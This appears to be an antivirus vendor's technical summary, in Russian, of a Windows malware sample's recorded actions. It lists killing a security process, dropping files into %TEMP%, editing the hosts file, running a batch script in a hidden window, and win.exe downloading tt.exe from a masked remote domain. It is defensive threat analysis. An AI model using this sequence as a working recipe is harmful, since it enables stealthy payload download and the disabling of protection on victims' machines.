Техническая информация
- '%WINDIR%\syswow64\taskkill.exe' /im "praetorian.exe"
- %TEMP%\install.cmd
- %TEMP%\drv.dll
- %TEMP%\win.exe
- <DRIVERS>\etc\hosts
- DNS ASK ik####.air-bagan.org
- ClassName: '' WindowName: ''
- '%TEMP%\win.exe' http://ik####.air-bagan.org/tt.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\install.cmd" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\install.cmd" "
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\find.exe' /i "win.exe"